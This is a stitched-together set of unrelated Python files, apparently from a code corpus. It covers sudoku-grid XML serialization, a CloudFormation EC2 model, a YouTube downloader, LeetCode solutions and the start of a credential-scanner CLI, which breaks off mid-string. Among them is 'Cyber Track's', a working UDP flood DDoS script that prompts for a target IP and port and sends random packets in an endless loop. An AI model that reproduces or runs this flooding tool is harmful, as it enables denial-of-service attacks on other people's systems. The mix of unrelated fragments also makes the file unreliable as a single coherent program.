        if not elem.text or not elem.text.strip():
            elem.text = pad + " "
        if not elem.tail or not elem.tail.strip():
            elem.tail = pad
        for child in elem:
            indent(child, level+1)
        # Intentionally fixes up only the LAST child's tail (the loop
        # variable), matching the classic ElementTree recipe.
        if not child.tail or not child.tail.strip():
            child.tail = pad
    else:
        if level and (not elem.tail or not elem.tail.strip()):
            elem.tail = pad
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
class SudokuGridXMLFailure(Exception):
    """Raised when a sudoku-grid XML document has an unexpected structure."""
    pass
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def ParsePoolListFromXML(inputPoolList, delimeter=','):
    """Split a (stripped) delimiter-separated pool string into a list."""
    return inputPoolList.strip().split(delimeter)
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def CheckPoolDefinitionsInXMLFile(prPoolElements, pcPoolElements, rowPoolElements, colPoolElements):
    """Validate that each pool definition occurs exactly once and parse it.

    Each argument is a list of XML elements found for that pool type.
    Returns (prPools, pcPools, rowPools, colPools) as lists of labels.
    Raises SudokuGridXMLFailure if any pool is missing or duplicated.

    The original repeated the same validate-then-parse stanza four
    times; the logic is factored into a local helper.
    """
    def parseSingle(elements, poolName):
        # Each pool list must appear exactly once in the document.
        if len(elements) != 1:
            raise SudokuGridXMLFailure('Number of {} entries wrong'.format(poolName))
        return ParsePoolListFromXML(elements[0].text)

    prPools = parseSingle(prPoolElements, 'prPool')
    pcPools = parseSingle(pcPoolElements, 'pcPool')
    rowPools = parseSingle(rowPoolElements, 'rowPool')
    colPools = parseSingle(colPoolElements, 'colPool')
    return prPools, pcPools, rowPools, colPools
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def ImportSudokuCoordFromXML(xmlCoordObject):
    """Deserialize a <genomicCoord> element into a SudokuGenomicCoord.

    Optional attributes fall back to empty lists when missing or
    malformed, mirroring the format written by
    ExportSudokuCoordAsXMLSubElement.
    """
    from .grid import SudokuGenomicCoord

    coord = float(xmlCoordObject.attrib['coord'])
    locatability = str(xmlCoordObject.attrib['locatability'])
    readCount = float(xmlCoordObject.attrib['readCount'])

    try:
        locatabilityScore = float(xmlCoordObject.attrib['locatabilityScore'])
    except (KeyError, ValueError):
        # The score may legitimately be a non-numeric label.
        locatabilityScore = str(xmlCoordObject.attrib['locatabilityScore'])

    try:
        featureName = str(xmlCoordObject.attrib['featureName']).split('//')
    except KeyError:
        featureName = []

    try:
        # Bug fix: the original looped `for dist in dists: dist = int(dist)`,
        # which converted a throwaway loop variable and left the stored
        # values as strings.  Convert the list for real.
        dists = [int(dist) for dist in
                 str(xmlCoordObject.attrib['distanceFromFeatureTranslationStart']).split(',')]
    except (KeyError, ValueError):
        dists = []

    try:
        # Same fix as above for the fractional distances (floats).
        fracDists = [float(dist) for dist in
                     str(xmlCoordObject.attrib['fracDistanceFromFeatureTranslationStart']).split(',')]
    except (KeyError, ValueError):
        fracDists = []

    try:
        locusTags = str(xmlCoordObject.attrib['locusTag']).split(',')
    except KeyError:
        locusTags = []

    gCoord = SudokuGenomicCoord(int(coord), locatability, locatabilityScore,
                                int(readCount))
    gCoord.featureName = featureName
    gCoord.distanceFromFeatureTranslationStart = dists
    gCoord.fracDistanceFromFeatureTranslationStart = fracDists
    gCoord.locusTag = locusTags
    return gCoord
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def ImportSudokuWellFromXML(xmlWellObject):
    """Deserialize a <well> element into a SudokuWell.

    Reads the well's plate/row/col attributes, attaches one
    SudokuGenomicCoord per <genomicCoord> child and one coords dict per
    <addressSystem> child.  Raises SudokuGridXMLFailure if an
    <addressSystem> does not contain exactly one <coords> child.
    """
    from .grid import SudokuWell
    plateName = xmlWellObject.attrib['plateName']
    row = xmlWellObject.attrib['row']
    col = xmlWellObject.attrib['col']
    libraryAddress = xmlWellObject.attrib['libraryAddress']
    od = float(xmlWellObject.attrib['od'])
    plateRow = xmlWellObject.attrib['plateRow']
    plateCol = xmlWellObject.attrib['plateCol']
    sudokuWell = SudokuWell(plateName, plateRow, plateCol, row, col, OD=od)
    sudokuWell.libraryAddress = libraryAddress
    # Genomic coordinates of the read alignments in this well
    gCoords = xmlWellObject.findall('genomicCoord')
    for gCoord in gCoords:
        sudokuCoord = ImportSudokuCoordFromXML(gCoord)
        sudokuWell.readAlignmentCoords.append(sudokuCoord)
    # Per-address-system coordinate dictionaries
    addressSystems = xmlWellObject.findall('addressSystem')
    for addressSystem in addressSystems:
        name = addressSystem.attrib['name']
        coordsElements = addressSystem.findall('coords')
        if len(coordsElements) != 1:
            ex = SudokuGridXMLFailure('Too many coords!')
            raise ex
        else:
            coordsDict = {}
            for key in coordsElements[0].attrib.keys():
                coordsDict[key] = coordsElements[0].attrib[key]
            sudokuWell.addressDict[name] = coordsDict
    return sudokuWell
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def ImportSudokuColonyPurifiedWellFromXML(xmlWellObject):
    """Deserialize a <well> element into a SudokuColonyPurifiedWell.

    Same structure as ImportSudokuWellFromXML, plus the colony-
    purification specific attributes condensationType, hopedForCoord
    and hopedForPresent.  Raises SudokuGridXMLFailure if an
    <addressSystem> does not contain exactly one <coords> child.
    """
    from .isitinthere import SudokuColonyPurifiedWell
    from ast import literal_eval
    plateName = xmlWellObject.attrib['plateName']
    row = xmlWellObject.attrib['row']
    col = xmlWellObject.attrib['col']
    libraryAddress = xmlWellObject.attrib['libraryAddress']
    od = float(xmlWellObject.attrib['od'])
    plateRow = xmlWellObject.attrib['plateRow']
    plateCol = xmlWellObject.attrib['plateCol']
    # Attributes specific to SudokuColonyPurifiedWell
    condensationType = str(xmlWellObject.attrib['condensationType'])
    hopedForCoord = int(xmlWellObject.attrib['hopedForCoord'])
    # literal_eval safely parses the serialized boolean ("True"/"False")
    hopedForPresent = literal_eval(xmlWellObject.attrib['hopedForPresent'])
    sudokuWell = SudokuColonyPurifiedWell(plateName, plateRow, plateCol, row, col, OD=od)
    sudokuWell.libraryAddress = libraryAddress
    sudokuWell.condensationType = condensationType
    sudokuWell.hopedForCoord = hopedForCoord
    sudokuWell.hopedForPresent = hopedForPresent
    gCoords = xmlWellObject.findall('genomicCoord')
    for gCoord in gCoords:
        sudokuCoord = ImportSudokuCoordFromXML(gCoord)
        sudokuWell.readAlignmentCoords.append(sudokuCoord)
    addressSystems = xmlWellObject.findall('addressSystem')
    for addressSystem in addressSystems:
        name = addressSystem.attrib['name']
        coordsElements = addressSystem.findall('coords')
        if len(coordsElements) != 1:
            ex = SudokuGridXMLFailure('Too many coords!')
            raise ex
        else:
            coordsDict = {}
            for key in coordsElements[0].attrib.keys():
                coordsDict[key] = coordsElements[0].attrib[key]
            sudokuWell.addressDict[name] = coordsDict
    return sudokuWell
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def ImportSudokuPlateFromXML(plateElement, expectedRows=[], expectedCols=[],
                             expectedPlateName=None, expectedPlateRow=None, expectedPlateCol=None,
                             useSudokuColonyPurifiedWells=False):
    """Deserialize a <plate> element into a SudokuPlate.

    The expected* arguments, when provided, override the corresponding
    attributes stored in the XML.  Set useSudokuColonyPurifiedWells to
    deserialize wells as SudokuColonyPurifiedWell instead of SudokuWell.
    Raises SudokuGridXMLFailure if a <col> does not contain exactly one
    <well>.

    Cleanups vs. the original: removed an unused `import pdb`, replaced
    the manual while-index loop with direct iteration, and used
    `is None` for the sentinel checks.
    """
    from .grid import SudokuPlate

    rows = expectedRows if expectedRows != [] else plateElement.attrib['rows'].split(',')
    cols = expectedCols if expectedCols != [] else plateElement.attrib['cols'].split(',')
    plateName = expectedPlateName if expectedPlateName is not None else plateElement.attrib['plateName']
    plateRow = expectedPlateRow if expectedPlateRow is not None else plateElement.attrib['plateRow']
    plateCol = expectedPlateCol if expectedPlateCol is not None else plateElement.attrib['plateCol']

    sudokuPlate = SudokuPlate(plateName, plateRow, plateCol, rows, cols)

    for rowElement in plateElement.findall('row'):
        currentRow = rowElement.attrib['row']
        for colElement in rowElement.findall('col'):
            currentCol = colElement.attrib['col']
            wellElements = colElement.findall('well')
            # Exactly one <well> is expected per <col>.
            if len(wellElements) != 1:
                raise SudokuGridXMLFailure('Number of well entries is wrong!')
            if useSudokuColonyPurifiedWells == True:
                well = ImportSudokuColonyPurifiedWellFromXML(wellElements[0])
            else:
                well = ImportSudokuWellFromXML(wellElements[0])
            sudokuPlate.wellGrid[currentRow][currentCol] = well
    return sudokuPlate
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def ImportSudokuGridFromXML(fileName, useSudokuColonyPurifiedWells=False):
    """Load a sudoku grid from an XML file written by ExportSudokuGridToXML.

    Returns (sudokuGridLookupDict, prPools, pcPools, rowPools, colPools),
    where the lookup dict maps plate-row label -> plate-col label ->
    SudokuPlate.  Raises SudokuGridXMLFailure on malformed pool or plate
    definitions.
    """
    import xml.etree.ElementTree as ET
    from .grid import InitializeEmptySudokuGridLookupDict
    tree = ET.parse(fileName)
    root = tree.getroot()
    # NOTE(review): tempSudokuGrid is never used in this function.
    tempSudokuGrid = {}
    # Import the grid layout, including plate rows, plate columns, rows and columns
    prPoolElements = root.findall('prPools')
    pcPoolElements = root.findall('pcPools')
    rowPoolElements = root.findall('rowPools')
    colPoolElements = root.findall('colPools')
    prPools, pcPools, rowPools, colPools = \
    CheckPoolDefinitionsInXMLFile(prPoolElements, pcPoolElements, rowPoolElements, colPoolElements)
    sudokuGridLookupDict = InitializeEmptySudokuGridLookupDict(prPools, pcPools, rowPools, colPools)
    # Start at the level of plate rows
    plateRowElements = root.findall('PR')
    for pr in plateRowElements:
        plateRow = str(pr.attrib['plateRow'])
        plateColElements = pr.findall('PC')
        for pc in plateColElements:
            plateCol = str(pc.attrib['plateCol'])
            plateElements = pc.findall('plate')
            if len(plateElements) != 1:
                ex = SudokuGridXMLFailure('Number of plate entries is greater than 1')
                raise ex
            else:
                plate = ImportSudokuPlateFromXML(plateElements[0], \
                useSudokuColonyPurifiedWells=useSudokuColonyPurifiedWells)
                sudokuGridLookupDict[plateRow][plateCol] = plate
    return sudokuGridLookupDict, prPools, pcPools, rowPools, colPools
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def ExportListForXML(listToExport, delimeter=','):
    """Join *listToExport* into a single delimiter-separated string.

    Each element is converted with str(); an empty list yields ''.
    """
    # str.join replaces the original manual index loop: same output,
    # linear instead of quadratic string building.
    return delimeter.join(str(item) for item in listToExport)
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def ExportSudokuGridToXML(sudokuGridLookupDict, plateRowPools, plateColPools, rowPools, colPools,
                          fileName, useSudokuColonyPurifiedWells=False):
    """Serialize a full sudoku grid to an XML file.

    Writes the four pool label lists, then one <PR>/<PC>/<plate>
    hierarchy per plate in the lookup dict, pretty-printed via indent().
    The output is readable by ImportSudokuGridFromXML.
    """
    import xml.etree.ElementTree as ET

    sudokuGridTreeRoot = ET.Element('grid')
    prPoolSubElement = ET.SubElement(sudokuGridTreeRoot, 'prPools')
    prPoolSubElement.text = ExportListForXML(plateRowPools)
    pcPoolSubElement = ET.SubElement(sudokuGridTreeRoot, 'pcPools')
    pcPoolSubElement.text = ExportListForXML(plateColPools)
    rowPoolSubElement = ET.SubElement(sudokuGridTreeRoot, 'rowPools')
    rowPoolSubElement.text = ExportListForXML(rowPools)
    colPoolSubElement = ET.SubElement(sudokuGridTreeRoot, 'colPools')
    colPoolSubElement.text = ExportListForXML(colPools)

    for prKey in plateRowPools:
        PRSubElement = ET.SubElement(sudokuGridTreeRoot, 'PR')
        PRSubElement.set('plateRow', prKey)
        # (The original also computed a sorted key list here that was
        # never used; that dead work has been removed.)
        for pcKey in plateColPools:
            PCSubElement = ET.SubElement(PRSubElement, 'PC')
            PCSubElement.set('plateCol', pcKey)
            sudokuPlate = sudokuGridLookupDict[prKey][pcKey]
            ExportSudokuPlateAsXMLSubElement(PCSubElement, sudokuPlate, rowPools=rowPools,
                                             colPools=colPools,
                                             useSudokuColonyPurifiedWells=useSudokuColonyPurifiedWells)

    indent(sudokuGridTreeRoot)
    sudokuGridTree = ET.ElementTree(sudokuGridTreeRoot)
    sudokuGridTree.write(fileName)
    return
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def ExportSudokuPlateAsXMLSubElement(parent, plate, rowPools=[], colPools=[],
                                     useSudokuColonyPurifiedWells=False):
    """Serialize *plate* as a <plate> sub-element of *parent*.

    Row/column labels default to those found in plate.wellGrid when the
    rowPools/colPools arguments are empty.  Each well is serialized via
    ExportSudokuWellAsXMLSubElement (or the colony-purified variant).
    """
    import xml.etree.ElementTree as ET

    plateSubElement = ET.SubElement(parent, 'plate')
    plateSubElement.set('plateName', str(plate.plateName))
    plateSubElement.set('plateRow', str(plate.plateRow))
    plateSubElement.set('plateCol', str(plate.plateCol))

    wellGrid = plate.wellGrid
    rows = sorted(wellGrid.keys()) if len(rowPools) == 0 else rowPools
    # Bug fix: the original fallback read wellGrid[0], but wellGrid is
    # keyed by row label (see ImportSudokuPlateFromXML), so it could
    # never succeed; take the columns of the first row instead.
    cols = list(wellGrid[rows[0]].keys()) if len(colPools) == 0 else colPools

    plateSubElement.set('rows', ExportListForXML(rows))
    plateSubElement.set('cols', ExportListForXML(cols))

    for row in rows:
        rowSubElement = ET.SubElement(plateSubElement, 'row')
        rowSubElement.set('row', str(row))
        for col in cols:
            colSubElement = ET.SubElement(rowSubElement, 'col')
            colSubElement.set('col', str(col))
            well = plate.wellGrid[row][col]
            if useSudokuColonyPurifiedWells == False:
                ExportSudokuWellAsXMLSubElement(colSubElement, well)
            else:
                ExportSudokuColonyPurifiedWellAsXMLSubElement(colSubElement, well)
    return
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def ExportSudokuColonyPurifiedWellAsXMLSubElement(parent, well):
    """Serialize a SudokuColonyPurifiedWell as a <well> child of *parent*.

    Writes the common well attributes plus the colony-purification
    specific ones (condensationType, hopedForCoord, hopedForPresent),
    then one <addressSystem> per address system and one <genomicCoord>
    per read alignment coordinate.

    Cleanup vs. the original: eight prediction-related attributes were
    read from *well* into locals but never serialized; those dead reads
    have been removed.
    """
    import xml.etree.ElementTree as ET

    wellSubElement = ET.SubElement(parent, 'well')
    wellSubElement.set('plateName', str(well.plateName))
    wellSubElement.set('row', str(well.row))
    wellSubElement.set('col', str(well.col))
    wellSubElement.set('libraryAddress', str(well.libraryAddress))
    wellSubElement.set('od', str(well.OD))
    wellSubElement.set('plateRow', str(well.plateRow))
    wellSubElement.set('plateCol', str(well.plateCol))

    # Attributes specific to SudokuColonyPurifiedWell
    wellSubElement.set('condensationType', str(well.condensationType))
    wellSubElement.set('hopedForCoord', str(well.hopedForCoord))
    wellSubElement.set('hopedForPresent', str(well.hopedForPresent))

    for name in well.addressDict.keys():
        addressSubElement = ET.SubElement(wellSubElement, 'addressSystem')
        addressSubElement.set('name', str(name))
        coordSubElement = ET.SubElement(addressSubElement, 'coords')
        for coordKey in well.addressDict[name].keys():
            coordSubElement.set(coordKey, str(well.addressDict[name][coordKey]))

    for gCoord in well.readAlignmentCoords:
        ExportSudokuCoordAsXMLSubElement(wellSubElement, gCoord)
    return
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def ExportSudokuWellAsXMLSubElement(parent, well):
    """Serialize a SudokuWell as a <well> sub-element of *parent*.

    Writes the well's identifying attributes, then one <addressSystem>
    per address system and one <genomicCoord> per read alignment
    coordinate.
    """
    import xml.etree.ElementTree as ET

    wellSubElement = ET.SubElement(parent, 'well')
    wellSubElement.set('plateName', str(well.plateName))
    wellSubElement.set('row', str(well.row))
    wellSubElement.set('col', str(well.col))
    wellSubElement.set('libraryAddress', str(well.libraryAddress))
    wellSubElement.set('od', str(well.OD))
    wellSubElement.set('plateRow', str(well.plateRow))
    wellSubElement.set('plateCol', str(well.plateCol))

    for name in well.addressDict.keys():
        addressSubElement = ET.SubElement(wellSubElement, 'addressSystem')
        addressSubElement.set('name', str(name))
        coordSubElement = ET.SubElement(addressSubElement, 'coords')
        for coordKey in well.addressDict[name].keys():
            coordSubElement.set(coordKey, str(well.addressDict[name][coordKey]))

    for gCoord in well.readAlignmentCoords:
        ExportSudokuCoordAsXMLSubElement(wellSubElement, gCoord)
    return
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def ExportSudokuCoordAsXMLSubElement(parent, gCoord):
    """Serialize a SudokuGenomicCoord as a <genomicCoord> child of *parent*.

    List-valued fields are comma-joined; attribute insertion order is
    kept as-is since it determines the serialized byte order.
    """
    import xml.etree.ElementTree as ET
    gCoordSubElement = ET.SubElement(parent, 'genomicCoord')
    gCoordSubElement.set('coord', str(gCoord.coord))
    gCoordSubElement.set('locatability', str(gCoord.locatability))
    gCoordSubElement.set('locatabilityScore', str(gCoord.locatabilityScore))
    gCoordSubElement.set('readCount', str(gCoord.readCount))
    # NOTE(review): featureName is joined with ',' here but split on '//'
    # by ImportSudokuCoordFromXML -- confirm the intended delimiter.
    gCoordSubElement.set('featureName', ExportListForXML(gCoord.featureName, delimeter=','))
    gCoordSubElement.set('distanceFromFeatureTranslationStart', \
    ExportListForXML(gCoord.distanceFromFeatureTranslationStart, delimeter=','))
    gCoordSubElement.set('fracDistanceFromFeatureTranslationStart', \
    ExportListForXML(gCoord.fracDistanceFromFeatureTranslationStart, delimeter=','))
    gCoordSubElement.set('locusTag', ExportListForXML(gCoord.locusTag, delimeter=','))
    return
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def ExportFeatureTagDictAsXMLSubElement(parent, tagDict):
    """Serialize *tagDict* as a <tagDict> sub-element of *parent*.

    Each key becomes a child element whose text is the comma-joined
    value list.
    """
    import xml.etree.ElementTree as ET

    tagDictSubElement = ET.SubElement(parent, 'tagDict')
    for key, values in tagDict.items():
        ET.SubElement(tagDictSubElement, key).text = ExportListForXML(values, delimeter=',')
    return
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def ExportGeneFeatureArrayToXML(geneFeatureArray, fileName):
    """Serialize a list of gene features to an XML file readable by
    ImportFeatureArrayFromXML.

    Each feature becomes a <gene> element carrying its coordinates and
    translation boundaries, its sudoku/rearrayed grid wells, and its tag
    dictionary.
    """
    import xml.etree.ElementTree as ET
    geneFeatureTreeRoot = ET.Element('genes')
    i = 0
    while i < len(geneFeatureArray):
        feature = geneFeatureArray[i]
        coordinates = feature.coordinates
        featureType = feature.featureType
        featureName = feature.featureName
        startCoord = feature.startCoord
        endCoord = feature.endCoord
        startTranslation = feature.startTranslation
        endTranslation = feature.endTranslation
        tagDict = feature.tagDict
        featureSubElement = ET.SubElement(geneFeatureTreeRoot, 'gene')
        featureSubElement.set('coordinates', coordinates)
        featureSubElement.set('featureType', featureType)
        featureSubElement.set('featureName', featureName)
        featureSubElement.set('startCoord', str(startCoord))
        featureSubElement.set('endCoord', str(endCoord))
        featureSubElement.set('startTranslation', str(startTranslation))
        featureSubElement.set('endTranslation', str(endTranslation))
        for well in feature.sudokuGridEntries:
            ExportSudokuWellAsXMLSubElement(featureSubElement, well)
        # NOTE(review): ExportSudokuRearrayedWellAsXMLSubElement is not
        # defined in this module -- confirm it is provided elsewhere.
        for well in feature.rearrayedGridEntries:
            ExportSudokuRearrayedWellAsXMLSubElement(featureSubElement, well)
        ExportFeatureTagDictAsXMLSubElement(featureSubElement, feature.tagDict)
        i += 1
    indent(geneFeatureTreeRoot)
    geneFeatureTree = ET.ElementTree(geneFeatureTreeRoot)
    geneFeatureTree.write(fileName)
    return
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def ImportTagDictFromXML(xmlTagDicts):
    """Collect child tags/texts from <tagDict> elements into a dict of lists.

    *xmlTagDicts* is an iterable of XML elements; each child contributes
    its text to the list stored under its tag.  Repeated tags append in
    document order.

    Cleanups vs. the original: removed an unused `import pdb`, stopped
    shadowing the builtin `dict` as a loop variable, and replaced the
    duplicated membership test with setdefault().
    """
    tagDict = {}
    for tagDictElement in xmlTagDicts:
        for child in tagDictElement:
            tagDict.setdefault(child.tag, []).append(child.text)
    return tagDict
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def ImportFeatureArrayFromXML(fileName):
    """Load gene features from an XML file written by ExportGeneFeatureArrayToXML.

    Returns a list of Feature3 objects with their wells and tag
    dictionaries re-attached.

    NOTE(review): Feature3 is neither defined nor imported in this
    module, so this function raises NameError unless the symbol is
    injected from elsewhere -- confirm the intended import.
    """
    import xml.etree.ElementTree as ET
    tree = ET.parse(fileName)
    root = tree.getroot()
    geneFeatureArray = []
    features = root.findall('gene')
    for feature in features:
        coordinates = feature.attrib['coordinates']
        featureType = feature.attrib['featureType']
        featureGene = None  # placeholder comment removed; see below
        geneFeature = Feature3(featureType, coordinates)
        geneFeature.featureName = feature.attrib['featureName']
        geneFeature.startCoord = int(feature.attrib['startCoord'])
        geneFeature.endCoord = int(feature.attrib['endCoord'])
        geneFeature.startTranslation = int(feature.attrib['startTranslation'])
        geneFeature.endTranslation = int(feature.attrib['endTranslation'])
        # Re-attach the serialized wells
        sudokuWells = feature.findall('well')
        for well in sudokuWells:
            sudokuWell = ImportSudokuWellFromXML(well)
            geneFeature.sudokuGridEntries.append(sudokuWell)
        # NOTE(review): ImportSudokuRearrayedWellFromXML is not defined in
        # this module -- confirm it is provided elsewhere.
        sudokuRearrayedWells = feature.findall('rearrayedWell')
        for well in sudokuRearrayedWells:
            sudokuRearrayedWell = ImportSudokuRearrayedWellFromXML(well)
            geneFeature.rearrayedGridEntries.append(sudokuRearrayedWell)
        tagDicts = feature.findall('tagDict')
        tagDict = ImportTagDictFromXML(tagDicts)
        geneFeature.tagDict = tagDict
        geneFeatureArray.append(geneFeature)
    return geneFeatureArray
# ------------------------------------------------------------------------------------------------ # | StarcoderdataPython |
3362185 | from __future__ import absolute_import, division, print_function
from cfn_model.model.ModelElement import ModelElement
class EC2Instance(ModelElement):
    """
    Model element for an AWS::EC2::Instance resource in a CloudFormation
    template (cfn_model).
    """
    def __init__(self, cfn_model):
        """
        Initialize an empty EC2 instance model.
        :param cfn_model: the parsed CloudFormation model this element belongs to
        """
        # attr_accessor :security_groups
        ModelElement.__init__(self, cfn_model)
        # Security group IDs referenced directly by the instance.
        self.securityGroupIds= []
        # Network interface definitions attached to the instance.
        self.networkInterfaces= []
        # Resolved security group objects (populated later by the parser).
        self.security_groups= []
        self.resource_type = 'AWS::EC2::Instance'
| StarcoderdataPython |
import argparse

# Minimal argparse usage example: a single boolean flag.
argparser = argparse.ArgumentParser("python argparse_example.py")
argparser.add_argument('-n', '--no-confirm',
                       action='store_true', dest="no_confirm",
                       help="Skip confirming deletion of existing dotfiles " +
                            "that would be overwritten")

if __name__ == '__main__':
    args = argparser.parse_args()
    # Fixed: the original used the Python 2 `print` statement, which is a
    # SyntaxError under Python 3.
    print(args.no_confirm)
| StarcoderdataPython |
3221424 | from pytube import YouTube
import os
def download_video(url, name):
    """Download a YouTube video as MP4 into this script's directory.

    :param url: YouTube video URL.
    :param name: filename to save the video under.
    :return: True on success, False on any failure.
    """
    try:
        # Create a YouTube instance for the URL (legacy pytube API).
        yt = YouTube(url)
        # Set the output filename.
        yt.set_filename(name)
        # Resolve the directory containing this script.
        curr_dir = os.path.dirname(os.path.abspath(__file__))
        # Pick the highest-resolution MP4 stream (filter returns them ordered).
        video = yt.filter('mp4')[-1]
        # Save the video next to this script.
        video.download(curr_dir)
        return True
    except Exception:
        # Fixed: was a bare `except:`, which also swallowed KeyboardInterrupt
        # and SystemExit. Best-effort semantics (return False) are preserved.
        return False
1627885 | <gh_stars>0
def uniquePath2(obstacleGrid: list):
"""
Este algoritmo resuelve el siguiente ejercicio:
Unique Path II
https://leetcode.com/problems/unique-paths-ii/
Este algoritmo retorna el número de caminos únicos que puede seguir un robot
para llegar a la meta. El robot se ubica en la posición superior izquierda y
la meta en la posición inferior derecha de un arreglo. El arreglo
representa un mapa con caminos (0) y obstáculos (1).
"""
OBSTACLE = 1
roads = [[0 for y in x] for x in obstacleGrid]
m = len(roads)
n = len(roads[0])
if obstacleGrid[0][0] == OBSTACLE:
return 0
if m == 1 and n == 1:
return 1
roads[0][0] = 1
for col in range(1, n):
if obstacleGrid[0][col] != OBSTACLE:
left = roads[0][col - 1]
roads[0][col] = left
for row in range(1, m):
for col in range(n):
if obstacleGrid[row][col] != OBSTACLE:
top = roads[row - 1][col]
left = roads[row][col - 1]
roads[row][col] = top + left
return roads[-1][-1]
def display(a):
    """Print every row of a two-dimensional array on its own line."""
    print('\n'.join(str(row) for row in a))
# Test
obstacles = [
[0, 0, 0],
[0, 1, 0],
[0, 0, 0]]
display(obstacles)
print(f'uniquePath2(obstacles): {uniquePath2(obstacles)}\n')
obstacles = [
[0, 0, 0, 1, 1],
[0, 1, 0, 1, 0],
[0, 0, 0, 0, 0]]
display(obstacles)
print(f'uniquePath2(obstacles): {uniquePath2(obstacles)}\n')
obstacles = [
[0, 0, 0, 0, 1],
[0, 1, 0, 0, 1],
[0, 1, 1, 0, 1],
[0, 0, 0, 0, 0]]
display(obstacles)
print(f'uniquePath2(obstacles): {uniquePath2(obstacles)}\n')
obstacles = [
[0, 0, 0],
[0, 1, 0],
[0, 0, 0],
[1, 0, 1],
[0, 0, 0]]
display(obstacles)
print(f'uniquePath2(obstacles): {uniquePath2(obstacles)}\n')
obstacles = [
[0, 0, 0, 0, 0],
[0, 1, 0, 0, 0],
[0, 0, 1, 1, 0],
[0, 0, 0, 1, 0],
[1, 1, 0, 0, 0]]
display(obstacles)
print(f'uniquePath2(obstacles): {uniquePath2(obstacles)}\n') | StarcoderdataPython |
3382106 | <filename>Dataset/Leetcode/valid/12/578.py
class Solution(object):
    """LeetCode 12 "Integer to Roman": convert an integer to its Roman
    numeral representation."""

    # Value/symbol pairs in descending order, including the subtractive
    # forms (900 -> CM, 40 -> XL, ...), so a greedy scan is correct.
    _VALUE_SYMBOLS = (
        (1000, 'M'), (900, 'CM'), (500, 'D'), (400, 'CD'),
        (100, 'C'), (90, 'XC'), (50, 'L'), (40, 'XL'),
        (10, 'X'), (9, 'IX'), (5, 'V'), (4, 'IV'), (1, 'I'),
    )

    def XXX(self, num):
        """Return the Roman numeral for `num` (valid for 1 <= num <= 3999).

        Replaces the original recursive if/elif ladder (one recursion level
        per emitted symbol) with the standard iterative greedy algorithm:
        repeatedly subtract the largest table value that still fits.
        """
        parts = []
        for value, symbol in self._VALUE_SYMBOLS:
            while num >= value:
                parts.append(symbol)
                num -= value
        return ''.join(parts)
| StarcoderdataPython |
168508 | from .traj_conv import TrajConvFunction, TrajConv
__all__ = ['TrajConvFunction', 'TrajConv']
| StarcoderdataPython |
190760 | # -*- coding: utf-8 -*-
__author__ = "<NAME>"
__copyright__ = "<NAME>"
__license__ = "mit"
| StarcoderdataPython |
93771 | <filename>#Cyber Track's.py
#Cyber Track's
#modulos
import sys
import time
import socket
import random
import os
#codigo de tiempo
from datetime import datetime
now = datetime.now()
year = now.year
day = now.day
hour = now.hour
minute = now.minute
month = now.month
#colores
G = "\033[16m"
D = "\033[16m"
T = "\033[39m"
cy = "\033[38;2;23;147;299m"
A = "\033[16m"
m = "\033[16m"
ac = "\033[16m"
##########
sock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
bytes = random._urandom(1490)
##########
print(ac)
os.system("clear")
print("""
█▀▀ █▄█ █▄▄ █▀▀ █▀█ ▀█▀ █▀█ ▄▀█ █▀▀ █▄▀
█▄▄ ░█░ █▄█ ██▄ █▀▄ ░█░ █▀▄ █▀█ █▄▄ █░█
""")
print(f"Disfruta la herramienta;3")
print ("Tik Tok: Joke_707")
print
print(cy)
ip = input("Ingresa La Direccion Ip: ")
port = eval(input("Ingresa El Puerto: "))
os.system("clear")
print(" Cyber Track Ddos ")
print("0% ")
time.sleep(1)
print(" 5%")
time.sleep(1)
print("10%")
time.sleep(1)
print("30% ")
time.sleep(2)
print(" 50% ")
time.sleep(1)
print(" 75%")
time.sleep(5)
print(" 100% ")
time.sleep(10)
#color
G = "\003[6086m"
print(G)
sent = 0
while True:
sock.sendto(bytes,(ip,port))
sent = sent + 1
print("Cyber Track's' : sent %s packet to %s throught port:%s"%(sent,ip,port)) | StarcoderdataPython |
1758619 | <gh_stars>100-1000
import argparse
import logging
import os
from credentialdigger import PgClient, SqliteClient
from dotenv import load_dotenv
from . import (add_rules, get_discoveries, scan, scan_path,
scan_snapshot, scan_user, scan_wiki)
logger = logging.getLogger(__name__)
class customParser(argparse.ArgumentParser):
    """ArgumentParser variant that, on a parse error, logs the message and
    prints the full help text before exiting (instead of argparse's short
    usage-only error)."""
    def error(self, message):
        # Log the parse error, show the complete help, then terminate.
        logger.error(f'{message}\n')
        self.print_help()
        exit()
def main(sys_argv):
    """Entry point of the credentialdigger CLI.

    Builds the argparse command tree (add_rules, scan, scan_user, scan_wiki,
    scan_path, scan_snapshot, get_discoveries), loads environment variables,
    instantiates a database client for the commands that need one, and
    dispatches to the selected subcommand's `run` function.

    :param sys_argv: the full sys.argv list (element 0 is the program name).
    """
    # Main parser configuration
    main_parser = customParser('credentialdigger')
    subparsers = main_parser.add_subparsers()

    # Common parsers configuration (shared via `parents=` below)
    parser_dotenv = customParser(add_help=False)
    parser_dotenv.add_argument(
        '--dotenv', type=str, default=None,
        help='The path to the .env file which will be used in all \
        commands. If not specified, the one in the current directory will \
